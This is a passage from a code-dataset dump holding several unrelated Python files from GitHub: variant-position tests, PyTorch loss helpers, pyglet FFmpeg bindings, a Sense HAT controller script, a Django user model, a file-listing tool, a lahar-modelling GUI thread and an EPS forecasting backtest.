self.assertListEqual(self.sorted_variants, sorted(shuffled_variants))\n\n\n# TODO: add amino acid variants\nclass TestAdjacency(unittest.TestCase):\n def test_adjacent_pairs(self) -> None:\n adjacent_pairs = (\n (\"-45-2\", \"-45-1\"),\n (\"-45-1\", \"-45\"),\n (\"-12\", \"-13\"),\n (\"-1\", \"1\"),\n (\"8\", \"9\"),\n (\"202-1\", \"202\"),\n (\"99\", \"99+1\"),\n (\"99+88\", \"99+89\"),\n (\"100-12\", \"100-11\"),\n (\"100\", \"101\"),\n (\"*1\", \"*2\"),\n (\"*73-1\", \"*73\"),\n )\n for s1, s2 in adjacent_pairs:\n v1 = VariantPosition(s1)\n v2 = VariantPosition(s2)\n with self.subTest(v1=v1, v2=v2):\n self.assertTrue(v1.is_adjacent(v2))\n with self.subTest(v1=v1, v2=v2):\n self.assertTrue(v2.is_adjacent(v1))\n\n def test_not_adjacent_to_self(self) -> None:\n position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"100\",\n \"103\",\n \"202-12\",\n \"202-1\",\n \"205\",\n \"*1\",\n \"*12\",\n \"*73-105\",\n )\n variants = [VariantPosition(s) for s in position_strings]\n for v in variants:\n with self.subTest(v=v):\n self.assertFalse(v.is_adjacent(v))\n\n def test_non_adjacent_pairs(self) -> None:\n position_strings = (\n \"-45-1\",\n \"-12\",\n \"8\",\n \"99\",\n \"99+88\",\n \"99+122\",\n \"100-12\",\n \"103\",\n \"202-12\",\n \"202-1\",\n \"205\",\n \"*1\",\n \"*12\",\n \"*73-105\",\n )\n variants = [VariantPosition(s) for s in position_strings]\n\n for v1, v2 in itertools.permutations(variants, 2):\n with self.subTest(v1=v1, v2=v2):\n self.assertFalse(v1.is_adjacent(v2))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"VariantEffect/mavehgvs","sub_path":"tests/test_position.py","file_name":"test_position.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"74140361865","text":"from torch import nn\nfrom torchdistill.losses.single import register_single_loss\nfrom torchdistill.losses.util import register_func2extract_org_output\n\n\n@register_func2extract_org_output\ndef extract_org_loss_dict(org_criterion, student_outputs, teacher_outputs, targets, uses_teacher_output, **kwargs):\n \"\"\"\n Extracts loss(es) from student_outputs inside `TrainingBox` or `DistillationBox` in `torchdistill`.\n\n :param org_criterion: not used\n :type org_criterion: nn.Module\n :param student_outputs: student models' output\n :type student_outputs: dict or Any\n :param teacher_outputs: not used\n :type teacher_outputs: Any\n :param targets: not used\n :type targets: Any\n :param uses_teacher_output: not used\n :type uses_teacher_output: bool\n :return: original loss dict\n :rtype: class\n \"\"\"\n org_loss_dict = dict()\n if isinstance(student_outputs, dict):\n org_loss_dict.update(student_outputs)\n return org_loss_dict\n\n\n@register_func2extract_org_output\ndef extract_org_segment_loss(org_criterion, student_outputs, teacher_outputs, targets, uses_teacher_output, **kwargs):\n \"\"\"\n Computes loss(es) using the original loss module inside `TrainingBox` or `DistillationBox` in `torchdistill`\n for semantic segmentation models in `torchvision`.\n\n :param org_criterion: original loss module\n :type org_criterion: nn.Module\n :param student_outputs: student models' output\n :type student_outputs: dict or Any\n :param teacher_outputs: not used\n :type teacher_outputs: Any\n :param targets: targets\n :type targets: Any\n :param uses_teacher_output: not used\n :type uses_teacher_output: bool\n :return: original loss dict\n :rtype: 
class\n \"\"\"\n org_loss_dict = dict()\n if isinstance(student_outputs, dict):\n sub_loss_dict = dict()\n for key, outputs in student_outputs.items():\n sub_loss_dict[key] = org_criterion(outputs, targets)\n\n org_loss = sub_loss_dict['out']\n if 'aux' in sub_loss_dict:\n org_loss += 0.5 * sub_loss_dict['aux']\n org_loss_dict['total'] = org_loss\n return org_loss_dict\n\n\n@register_single_loss\nclass BppLoss(nn.Module):\n \"\"\"\n Bit-per-pixel (or rate) loss.\n\n :param entropy_module_path: entropy module path to extract its output from io_dict\n :type entropy_module_path: str\n :param reduction: reduction type ('sum', 'batchmean', or 'mean')\n :type reduction: str or None\n \"\"\"\n def __init__(self, entropy_module_path, reduction='mean'):\n super().__init__()\n self.entropy_module_path = entropy_module_path\n self.reduction = reduction\n\n def forward(self, student_io_dict, *args, **kwargs):\n \"\"\"\n Computes a rate loss.\n\n :param student_io_dict: io_dict of model to be trained\n :type student_io_dict: dict\n \"\"\"\n entropy_module_dict = student_io_dict[self.entropy_module_path]\n intermediate_features, likelihoods = entropy_module_dict['output']\n n, _, h, w = intermediate_features.shape\n num_pixels = n * h * w\n if self.reduction == 'sum':\n bpp = -likelihoods.log2().sum()\n elif self.reduction == 'batchmean':\n bpp = -likelihoods.log2().sum() / n\n else:\n bpp = -likelihoods.log2().sum() / num_pixels\n return bpp\n","repo_name":"yoshitomo-matsubara/sc2-benchmark","sub_path":"sc2bench/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"18304790531","text":"from ctypes import c_int, c_uint16, c_int32, c_int64, c_uint32, c_uint64\nfrom ctypes import c_uint8, c_uint, c_double, c_float, c_ubyte, c_size_t, c_char, c_char_p\nfrom ctypes import c_void_p, addressof, byref, cast, POINTER, CFUNCTYPE, Structure, Union\nfrom ctypes import create_string_buffer, memmove\n\nimport pyglet\nimport pyglet.lib\nfrom . import libavcodec\nfrom . 
import libavutil\n\navformat = pyglet.lib.load_library(\n 'avformat',\n win32='avformat-58',\n darwin='avformat.58'\n)\n\nAVSEEK_FLAG_BACKWARD = 1 # ///< seek backward\nAVSEEK_FLAG_BYTE = 2 # ///< seeking based on position in bytes\nAVSEEK_FLAG_ANY = 4 # ///< seek to any frame, even non-keyframes\nAVSEEK_FLAG_FRAME = 8 # ///< seeking based on frame number\n\nMAX_REORDER_DELAY = 16\n\n\nclass AVPacketList(Structure): pass\n\n\nclass AVInputFormat(Structure):\n _fields_ = [\n ('name', c_char_p)\n ]\n\n\nclass AVOutputFormat(Structure):\n pass\n\n\nclass AVIOContext(Structure):\n pass\n\n\nclass AVIndexEntry(Structure):\n pass\n\n\nclass AVStreamInfo(Structure):\n _fields_ = [\n ('last_dts', c_int64),\n ('duration_gcd', c_int64),\n ('duration_count', c_int),\n ('rfps_duration_sum', c_int64),\n ('duration_error', POINTER(c_double * 2 * (30 * 12 + 30 + 3 + 6))),\n ('codec_info_duration', c_int64),\n ('codec_info_duration_fields', c_int64),\n ('frame_delay_evidence', c_int),\n ('found_decoder', c_int),\n ('last_duration', c_int64),\n ('fps_first_dts', c_int64),\n ('fps_first_dts_idx', c_int),\n ('fps_last_dts', c_int64),\n ('fps_last_dts_idx', c_int),\n ]\n\n\nclass AVProbeData(Structure):\n _fields_ = [\n ('filename', c_char_p),\n ('buf', POINTER(c_ubyte)),\n ('buf_size', c_int),\n ('mime_type', c_char_p)\n ]\n\n\nclass FFFrac(Structure):\n pass\n\n\nclass AVStreamInternal(Structure):\n pass\n\n\nclass AVFrac(Structure):\n _fields_ = [\n ('val', c_int64),\n ('num', c_int64),\n ('den', c_int64),\n ]\n\n\nAVCodecContext = libavcodec.AVCodecContext\nAVPacketSideData = libavcodec.AVPacketSideData\nAVPacket = libavcodec.AVPacket\nAVCodecParserContext = libavcodec.AVCodecParserContext\nAVCodecParameters = libavcodec.AVCodecParameters\nAVRational = libavutil.AVRational\nAVDictionary = libavutil.AVDictionary\nAVFrame = libavutil.AVFrame\n\n\nclass AVStream(Structure):\n _fields_ = [\n ('index', c_int),\n ('id', c_int),\n ('codec', POINTER(AVCodecContext)),\n ('priv_data', c_void_p),\n ('time_base', AVRational),\n ('start_time', c_int64),\n ('duration', c_int64),\n ('nb_frames', c_int64),\n ('disposition', c_int),\n ('discard', c_int),\n ('sample_aspect_ratio', AVRational),\n ('metadata', POINTER(AVDictionary)),\n ('avg_frame_rate', AVRational),\n ('attached_pic', AVPacket),\n ('side_data', POINTER(AVPacketSideData)),\n ('nb_side_data', c_int),\n ('event_flags', c_int),\n ('r_frame_rate', AVRational),\n ('recommended_encoder_configuration', c_char_p),\n ('codecpar', POINTER(AVCodecParameters)),\n ('info', POINTER(AVStreamInfo)),\n ('pts_wrap_bits', c_int),\n ('first_dts', c_int64),\n ('cur_dts', c_int64),\n ('last_IP_pts', c_int64),\n ('last_IP_duration', c_int),\n ('probe_packets', c_int),\n ('codec_info_nb_frames', c_int),\n ('need_parsing', c_int),\n ('parser', POINTER(AVCodecParserContext)),\n ('last_in_packet_buffer', POINTER(AVPacketList)),\n ('probe_data', AVProbeData),\n ('pts_buffer', c_int64 * (MAX_REORDER_DELAY + 1)),\n ('index_entries', POINTER(AVIndexEntry)),\n ('nb_index_entries', c_int),\n ('index_entries_allocated_size', c_uint),\n ('stream_identifier', c_int),\n ('interleaver_chunk_size', c_int64),\n ('interleaver_chunk_duration', c_int64),\n ('request_probe', c_int),\n ('skip_to_keyframe', c_int),\n ('skip_samples', c_int),\n ('start_skip_samples', c_int64),\n ('first_discard_sample', c_int64),\n ('last_discard_sample', c_int64),\n ('nb_decoded_frames', c_int),\n ('mux_ts_offset', c_int64),\n ('pts_wrap_reference', c_int64),\n ('pts_wrap_behavior', c_int),\n 
('update_initial_durations_done', c_int),\n ('pts_reorder_error', c_int64 * (MAX_REORDER_DELAY + 1)),\n ('pts_reorder_error_count', c_uint8 * (MAX_REORDER_DELAY + 1)),\n ('last_dts_for_order_check', c_int64),\n ('dts_ordered', c_uint8),\n ('dts_misordered', c_uint8),\n ('inject_global_side_data', c_int),\n ('display_aspect_ratio', AVRational),\n ('internal', POINTER(AVStreamInternal))\n ]\n\n\nclass AVProgram(Structure):\n pass\n\n\nclass AVChapter(Structure):\n pass\n\n\nclass AVFormatInternal(Structure):\n pass\n\n\nclass AVIOInterruptCB(Structure):\n _fields_ = [\n ('callback', CFUNCTYPE(c_int, c_void_p)),\n ('opaque', c_void_p)\n ]\n\n\nAVClass = libavutil.AVClass\nAVCodec = libavcodec.AVCodec\n\n\nclass AVFormatContext(Structure):\n pass\n\n\nAVFormatContext._fields_ = [\n ('av_class', POINTER(AVClass)),\n ('iformat', POINTER(AVInputFormat)),\n ('oformat', POINTER(AVOutputFormat)),\n ('priv_data', c_void_p),\n ('pb', POINTER(AVIOContext)),\n ('ctx_flags', c_int),\n ('nb_streams', c_uint),\n ('streams', POINTER(POINTER(AVStream))),\n ('filename', c_char * 1024), # Deprecated\n ('url', c_char_p),\n ('start_time', c_int64),\n ('duration', c_int64),\n ('bit_rate', c_int64),\n ('packet_size', c_uint),\n ('max_delay', c_int),\n ('flags', c_int),\n ('probesize', c_int64),\n ('max_analyze_duration', c_int64),\n ('key', POINTER(c_uint8)),\n ('keylen', c_int),\n ('nb_programs', c_uint),\n ('programs', POINTER(POINTER(AVProgram))),\n ('video_codec_id', c_int),\n ('audio_codec_id', c_int),\n ('subtitle_codec_id', c_int),\n ('max_index_size', c_uint),\n ('max_picture_buffer', c_uint),\n ('nb_chapters', c_uint),\n ('chapters', POINTER(POINTER(AVChapter))),\n ('metadata', POINTER(AVDictionary)),\n ('start_time_realtime', c_int64),\n ('fps_probe_size', c_int),\n ('error_recognition', c_int),\n ('interrupt_callback', AVIOInterruptCB),\n ('debug', c_int),\n ('max_interleave_delta', c_int64),\n ('strict_std_compliance', c_int),\n ('event_flags', c_int),\n ('max_ts_probe', c_int),\n ('avoid_negative_ts', c_int),\n ('ts_id', c_int),\n ('audio_preload', c_int),\n ('max_chunk_duration', c_int),\n ('max_chunk_size', c_int),\n ('use_wallclock_as_timestamps', c_int),\n ('avio_flags', c_int),\n ('duration_estimation_method', c_uint),\n ('skip_initial_bytes', c_int64),\n ('correct_ts_overflow', c_uint),\n ('seek2any', c_int),\n ('flush_packets', c_int),\n ('probe_score', c_int),\n ('format_probesize', c_int),\n ('codec_whitelist', c_char_p),\n ('format_whitelist', c_char_p),\n ('internal', POINTER(AVFormatInternal)),\n ('io_repositioned', c_int),\n ('video_codec', POINTER(AVCodec)),\n ('audio_codec', POINTER(AVCodec)),\n ('subtitle_codec', POINTER(AVCodec)),\n ('data_codec', POINTER(AVCodec)),\n ('metadata_header_padding', c_int),\n ('opaque', c_void_p),\n ('control_message_cb', CFUNCTYPE(c_int,\n POINTER(AVFormatContext), c_int, c_void_p,\n c_size_t)),\n ('output_ts_offset', c_int64),\n ('dump_separator', POINTER(c_uint8)),\n ('data_codec_id', c_int),\n # ! 
one more in here?\n ('protocol_whitelist', c_char_p),\n ('io_open', CFUNCTYPE(c_int,\n POINTER(AVFormatContext),\n POINTER(POINTER(AVIOContext)),\n c_char_p, c_int,\n POINTER(POINTER(AVDictionary)))),\n ('io_close', CFUNCTYPE(None,\n POINTER(AVFormatContext), POINTER(AVIOContext))),\n ('protocol_blacklist', c_char_p),\n ('max_streams', c_int)\n]\n\navformat.av_register_all.restype = None\navformat.av_find_input_format.restype = c_int\navformat.av_find_input_format.argtypes = [c_int]\navformat.avformat_open_input.restype = c_int\navformat.avformat_open_input.argtypes = [\n POINTER(POINTER(AVFormatContext)),\n c_char_p,\n POINTER(AVInputFormat),\n POINTER(POINTER(AVDictionary))]\navformat.avformat_find_stream_info.restype = c_int\navformat.avformat_find_stream_info.argtypes = [\n POINTER(AVFormatContext),\n POINTER(POINTER(AVDictionary))]\navformat.avformat_close_input.restype = None\navformat.avformat_close_input.argtypes = [\n POINTER(POINTER(AVFormatContext))]\navformat.av_read_frame.restype = c_int\navformat.av_read_frame.argtypes = [POINTER(AVFormatContext),\n POINTER(AVPacket)]\navformat.av_seek_frame.restype = c_int\navformat.av_seek_frame.argtypes = [POINTER(AVFormatContext),\n c_int, c_int64, c_int]\navformat.avformat_seek_file.restype = c_int\navformat.avformat_seek_file.argtypes = [POINTER(AVFormatContext),\n c_int, c_int64, c_int64, c_int64, c_int]\navformat.av_guess_frame_rate.restype = AVRational\navformat.av_guess_frame_rate.argtypes = [POINTER(AVFormatContext),\n POINTER(AVStream), POINTER(AVFrame)]\n\n__all__ = [\n 'avformat',\n 'AVSEEK_FLAG_BACKWARD',\n 'AVSEEK_FLAG_BYTE',\n 'AVSEEK_FLAG_ANY',\n 'AVSEEK_FLAG_FRAME',\n 'AVFormatContext'\n]\n","repo_name":"jtl1207/comic-translation","sub_path":"pyglet/media/codecs/ffmpeg_lib/libavformat.py","file_name":"libavformat.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"81"} +{"seq_id":"72175494346","text":"from sense_hat import SenseHat\nimport XboxController\n\nsense = SenseHat()\n\nsense.set_rotation(180)\n# sense.show_message(\"Hello\")\n\ny = 0\nx = 0\nback_colour = (0,0,0)\n\ndef buttonPress(controlId, value): \n global y\n global x\n global back_colour\n if controlId == 17:\n if value == (0, -1):\n y = y + 1\n if value == (1, 0):\n x = x + 1\n if value == (0, 1):\n y = y - 1\n if value == (-1, 0):\n x = x - 1\n if controlId == 9:\n exit()\n\n if x == 8:\n x = 0\n if y == 8:\n y = 0\n if x == -1:\n x = 7\n if y == -1:\n y = 7\n\n red = (255, 0, 0)\n blue = (0, 0, 255)\n green = (0, 255, 0)\n black = (0, 0, 0)\n sense.clear(back_colour)\n sense.set_pixel(x, y, 255,255,255)\n\n\n if controlId == 6:\n back_colour = green\n if controlId == 7:\n back_colour = red\n if controlId == 8:\n back_colour = blue\n if controlId == 13:\n back_colour = black\n \nxboxCont = XboxController.XboxController(controllerCallBack = buttonPress)\nxboxCont.start()\n\n# sense.set_pixel(0,0,255,0,0)\n","repo_name":"IceXPR/piHAT","sub_path":"hat.py","file_name":"hat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28452304430","text":"from django.core.validators import RegexValidator\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, PermissionsMixin\nfrom django.utils.translation import gettext as _\n\n\nclass CustomUser(AbstractUser):\n phone_regex = RegexValidator(\n regex=\"^\\+?[1-9][0-9]{7,14}$\",\n message=\"Phone number 
must be entered in the format: \"\n \"'+999999999'. Up to 15 digits allowed.\"\n )\n\n GENDER_CHOICES = (\n ('M', _('Male')),\n ('F', _('Female')),\n )\n email = models.EmailField(max_length=255, unique=True, verbose_name=_(\"Email\"))\n first_name = models.CharField(max_length=250, verbose_name=_(\"First name\"))\n last_name = models.CharField(max_length=250, verbose_name=_(\"Last name\"))\n age = models.PositiveIntegerField(null=True, blank=True, verbose_name=_(\"Age\"))\n gender = models.CharField(max_length=1, choices=GENDER_CHOICES,\n null=True,\n blank=True,\n verbose_name=_(\"Gender\"))\n phone_number = models.CharField(validators=[phone_regex],\n max_length=50,\n unique=True,\n verbose_name=_(\"Phone number\"))\n","repo_name":"hatef97/online-shop-goalearn","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26568042729","text":"#!/usr/bin/env python3\nimport os\nimport logging\nimport subprocess\nimport sys\n\nfrom fnmatch import fnmatch\nfrom string import Template\nfrom tempfile import TemporaryDirectory\n\nfrom filefind.config import load_config\nfrom filefind.pattern import Pattern\nfrom filefind.submodules import list_submodules\n\n\nclass AtTemplate(Template):\n \"\"\"Like template, but uses '@' as a delimiter to avoid clashes with\n environment variables.\"\"\"\n delimiter = '@'\n\n\ndef match_patterns(patterns, path_components):\n for pattern in patterns:\n if pattern.match(path_components):\n return True\n return False\n\n\ndef do_list_files(config):\n excluded_dirs = {os.path.join(config.directory, '.git')}\n if config.exclude_submodules:\n for submodule in list_submodules(config.directory):\n excluded_dirs.add(os.path.join(config.directory, submodule))\n\n include_patterns = [Pattern(x) for x in config.include]\n exclude_patterns = [Pattern(x) for x in config.exclude]\n\n for dirpath, dirnames, filenames in os.walk(config.directory):\n relative_dirpath = os.path.relpath(dirpath, config.directory)\n dirpath_components = relative_dirpath.split('/')\n\n # Remove excluded_dirs from dirnames. 
We must modify the actual\n # dirnames instance, we can't replace it, hence the old-school\n # iteration\n for idx in range(len(dirnames) - 1, -1, -1):\n if os.path.join(dirpath, dirnames[idx]) in excluded_dirs:\n del dirnames[idx]\n elif match_patterns(exclude_patterns, dirpath_components + [dirnames[idx]]):\n del dirnames[idx]\n\n for filename in filenames:\n path_components = dirpath_components + [filename]\n if match_patterns(exclude_patterns, path_components):\n continue\n if include_patterns:\n if not match_patterns(include_patterns, path_components):\n continue\n yield os.path.join(*path_components)\n\n\ndef list_files(config):\n for path in do_list_files(config):\n print(path)\n return 0\n\n\ndef run_commands(config):\n with TemporaryDirectory(prefix='filefind-') as tmp_dir_name:\n file_list = os.path.join(tmp_dir_name, 'lst')\n with open(file_list, 'wt') as fp:\n for path in do_list_files(config):\n print(path, file=fp)\n\n for command in config.exec_:\n tmpl = AtTemplate(command)\n cmd = tmpl.safe_substitute(filelist=file_list)\n logging.info('Running `{}`'.format(cmd))\n returncode = subprocess.call(cmd, cwd=config.directory, shell=True)\n if returncode != 0:\n logging.error('Command `{}` failed with error code {}'.format(cmd, returncode))\n return 1\n return 0\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n config = load_config(sys.argv[1:])\n\n if config.exec_:\n return run_commands(config)\n else:\n return list_files(config)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n# vi: ts=4 sw=4 et\n","repo_name":"agateau/filefind","sub_path":"filefind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"456247696","text":"import traceback\nfrom datetime import datetime\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\nfrom typing import List, Optional, Tuple\n\nfrom pearpy.create_surface_hydro import _create_surface_hydro, generate_output_filenames\nfrom pearpy.distal_inundation import StartPoint, _batch_lahar_inundation\nfrom pearpy.gui.model.main import MainModel\nfrom pearpy.gui.thread._thread import CustomThread, SignalDict, ThreadSignals\nfrom pearpy.starting_point2 import find_starting_points, save2txt\nfrom PySide2.QtWidgets import QMainWindow\nfrom shapely.geometry.point import Point\n\n\nclass MainPageThread(CustomThread):\n def __init__(self, model: MainModel, parent: QMainWindow) -> None:\n super().__init__(parent)\n self.signals = ThreadSignals()\n self.model = model\n\n def _progress_callback_surface_hydro(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n timestamp=int(datetime.now().timestamp()),\n description=\"Generating surface hydro...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def _progress_callback_startingp(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n timestamp=int(datetime.now().timestamp()),\n description=\"Finding starting points...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def _progress_callback_inundation(self, total: int, current: int) -> None:\n self.signals.progress.emit(\n SignalDict(\n progress_total=total,\n progress_current=current,\n progress_type=\"main\",\n 
timestamp=int(datetime.now().timestamp()),\n description=\"Generating inundation...\",\n )\n )\n if not self.running:\n raise KeyboardInterrupt(\"stop by user request\")\n\n def __run_surface_hydro(self) -> None:\n if isinstance(self.model.temporary_directory, TemporaryDirectory):\n if Path(self.model.temporary_directory.name).exists:\n self.model.temporary_directory.cleanup()\n\n if self.model.preserve_data:\n output_directory = self.model.output_folder.joinpath(\"processing_data\")\n output_directory.mkdir(exist_ok=True)\n else:\n output_temp_directory = TemporaryDirectory()\n output_directory = Path(output_temp_directory.name)\n self.model.temporary_directory = output_temp_directory\n\n (filled, direction, accumulation, stream_r) = generate_output_filenames(\n Path(output_directory).absolute(),\n self.model.surface_hydro.input_dem,\n self.model.surface_hydro.stream_value,\n )\n self.model.surface_hydro.dem_filled = filled\n self.model.surface_hydro.flow_direction = direction\n self.model.surface_hydro.flow_accumulation = accumulation\n self.model.surface_hydro.stream_raster = stream_r\n\n _create_surface_hydro(\n *self.model.surface_hydro.args, self._progress_callback_surface_hydro\n )\n\n def __run_starting_point(\n self,\n ) -> None:\n _starting_points, _processing_data = find_starting_points(\n self.model.starting_point.earlier_dsm,\n self.model.starting_point.later_dsm,\n str(self.model.surface_hydro.flow_direction),\n str(self.model.surface_hydro.stream_raster),\n self.model.starting_point.max_percent_length,\n self.model.starting_point.stream_buffer_size,\n self.model.preserve_data,\n self._progress_callback_startingp,\n )\n\n save2txt(\n _starting_points,\n Path(self.model.output_folder).joinpath(\n f\"{datetime.now().strftime('%Y%m%d-%H%M')}_starting_point.txt\"\n ),\n )\n\n self.model.starting_point.starting_points = _starting_points\n self.model.starting_point.processing_data = _processing_data\n\n def __run_inundation(self, starting_points: List[Tuple[Point, float]]) -> None:\n _starting_points = [\n StartPoint([int(sp.x), int(sp.y)], int(v)) for sp, v in starting_points\n ]\n _batch_lahar_inundation(\n str(self.model.surface_hydro.dem_filled),\n _starting_points,\n self.model.inundation.confidence_limit,\n str(self.model.output_folder),\n self.model.inundation.output_type,\n self._progress_callback_inundation,\n )\n\n def _do_work(self) -> None:\n try:\n self.__run_surface_hydro()\n self.signals.finished.emit()\n\n self.__run_starting_point()\n self.signals.finished.emit()\n\n self.__run_inundation(self.model.starting_point.starting_points)\n if self.model.starting_point.processing_data is not None:\n if self.model.preserve_data:\n self.model.starting_point.processing_data.save(\n self.model.output_folder.joinpath(\"processing_data\")\n )\n self.model.starting_point.reset()\n\n if self.model.temporary_directory is not None:\n if Path(self.model.temporary_directory.name).exists():\n self.model.temporary_directory.cleanup()\n\n self.signals.finished.emit()\n except Exception as error:\n traceback.print_exc()\n self.model.starting_point.reset()\n\n if self.model.temporary_directory is not None:\n if Path(self.model.temporary_directory.name).exists():\n self.model.temporary_directory.cleanup()\n self.signals.error.emit(str(error))\n if self.running:\n 
self.stop()\n","repo_name":"ruliandaru/pearpy","sub_path":"pearpy/gui/thread/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42496415135","text":"import sys\nimport platform\n\nif \"darwin\" in platform.system().lower():\n # mac\n sys.path.append(\"/Users/KXK2ZO/py_stock_research\")\nelse: # linux\n sys.path.append(\"/home/py_stock_research\")\n\nimport pandas as pd\nimport requests\nimport os\nimport random, math\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom matrix_factorization import BaselineModel, KernelMF\nfrom research.us.forecast_eps import ops\nimport logging\n\nroot_path = \"/Users/KXK2ZO/minor_research/R/jupyter_R/us_study/data\"\n\n\ndef prep_eps_df(raw_eps_df):\n raw_eps_df = raw_eps_df[raw_eps_df[\"EPS_TTM\"].map(lambda x: not pd.isna(x))]\n raw_eps_df[\"EPS_TTM\"] = raw_eps_df[\"EPS_TTM\"].map(lambda x: float(str(x).replace(\"M\", \"\")))\n raw_eps_df[\"MONTH\"] = raw_eps_df[\"YRMO\"].map(lambda x: int(x.split(\"-\")[1]))\n eps_ttm_df_max_month = raw_eps_df.groupby(\"TICKER\").agg(max_month=(\"MONTH\", \"max\")).reset_index()\n end_dec_universe = list(eps_ttm_df_max_month.query(\"max_month==12\").TICKER.unique())\n return raw_eps_df[raw_eps_df[\"TICKER\"].map(lambda x: x in end_dec_universe)]\n\n\ndef single_backtest(yrmo_list, price_df, eps_df, min_amt, mf_run_count, threshold_list, mask_ratio):\n _, price_start_date = ops.convert_yrmo_to_date(max(yrmo_list), \"01\")\n _, price_end_date = ops.convert_yrmo_to_date(max(yrmo_list), \"28\")\n price_start_date = price_start_date - timedelta(days=90)\n price_end_date = price_end_date + timedelta(days=150)\n reduced_price = price_df.query(\"DATE >= '{}'\".format(price_start_date.strftime(\"%Y-%m-%d\"))).query(\n \"DATE <= '{}'\".format(price_end_date.strftime(\"%Y-%m-%d\")))\n reduced_price[\"AMT\"] = reduced_price[\"CLOSE\"] * reduced_price[\"VOLUME\"] / (10 ** 6)\n amt_universe = list(ops.cal_median_amt(reduced_price, min(yrmo_list), max(yrmo_list)).query(\n \"AMTMEDIAN > {}\".format(str(min_amt))).TICKER.unique())\n reduced_eps_df = eps_df[eps_df[\"YRMO\"].map(lambda x: x in yrmo_list)]\n reduced_eps_df = reduced_eps_df[reduced_eps_df[\"TICKER\"].map(lambda x: x in amt_universe)]\n valid_eps_df = ops.get_complete_tickers(reduced_eps_df)\n valid_eps_df_growth = ops.get_eps_growth(valid_eps_df)\n valid_eps_df_growth = valid_eps_df_growth[valid_eps_df_growth[\"EPS_GROWTH\"].map(lambda x: not pd.isna(x))]\n valid_eps_df_growth_class = ops.classify_eps_growth(valid_eps_df_growth, threshold_list)\n logging.info(valid_eps_df_growth_class.head())\n class_list = sorted(list(valid_eps_df_growth_class.CLASS.unique()))\n logging.info(class_list)\n logging.info(len(valid_eps_df_growth_class.TICKER.unique()))\n multiple_mf_result = ops.do_multiple_mf(valid_eps_df_growth_class, mf_run_count, mask_ratio, min(class_list),\n max(class_list))\n match_yrmo_result = ops.convert_forecast_yrmo_to_price_yrmo(multiple_mf_result)\n pre_eps_df = valid_eps_df_growth.copy(True)[[\"TICKER\", \"PRE_EPS\", \"YRMO\"]]\n match_yrmo_result_pre_eps = match_yrmo_result.merge(pre_eps_df, on=[\"TICKER\", \"YRMO\"], how=\"inner\")\n return match_yrmo_result_pre_eps\n\n\ndef test_single_backtest():\n test_price = pd.read_csv(os.path.join(root_path, \"us_study_day_price.csv\"))\n test_yrmos = ['2009-09', '2009-12', '2010-03', '2010-06', '2010-09']\n test_min_amt = 5\n raw_eps = pd.read_json(os.path.join(root_path, 
\"us_eps_ttm.json\"), convert_dates=False)\n test_eps_df = prep_eps_df(raw_eps)\n actual = single_backtest(yrmo_list=test_yrmos,\n price_df=test_price,\n eps_df=test_eps_df,\n min_amt=test_min_amt,\n mf_run_count=20,\n threshold_list=[-0.5, -0.1, 0.1, 0.5],\n mask_ratio=0.5)\n logging.info(len(actual.TICKER.unique()))\n logging.info(actual.head())\n logging.info(actual.PRED_CLASS_MEDIAN.describe())\n logging.info(actual.PRED_CLASS_MEAN.describe())\n assert actual[actual[\"PRE_EPS\"].map(lambda x: pd.isna(x))].shape[0] == 0\n\n\ndef main():\n print(\"main started\")\n min_amt = 0.5\n mf_run_cnt = 20\n threshold_list_input = [-0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7]\n mask_ratio_input = 0.5\n price = pd.read_csv(os.path.join(root_path, \"us_study_day_price.csv\"))\n raw_eps = pd.read_json(os.path.join(root_path, \"us_eps_ttm.json\"), convert_dates=False)\n all_eps_df = prep_eps_df(raw_eps)\n all_yrmos = sorted(\n list(all_eps_df.groupby(\"YRMO\").agg(CNT=(\"TICKER\", \"count\")).reset_index().query(\"CNT > 1000\").YRMO.unique()))[\n 1:]\n mf_past_yrmo_length = 10\n mf_results = []\n while len(all_yrmos) >= mf_past_yrmo_length:\n subset_yrmos = all_yrmos[:mf_past_yrmo_length]\n all_yrmos = all_yrmos[1:] # reduce by one from first\n print((max(subset_yrmos), len(all_yrmos)))\n temp = single_backtest(subset_yrmos, price, all_eps_df, min_amt, mf_run_cnt, threshold_list_input,\n mask_ratio_input)\n print(len(temp.TICKER.unique()))\n print(temp.head())\n mf_results.append(temp)\n\n mf_result = pd.concat(mf_results, ignore_index=True)\n # mf_result.to_json(os.path.join(root_path, \"multiple_mf_eps_ttm_forest_next_qtr.json\"))\n print(mf_result.YRMO.unique())\n pass\n\n\nif __name__ == \"__main__\":\n 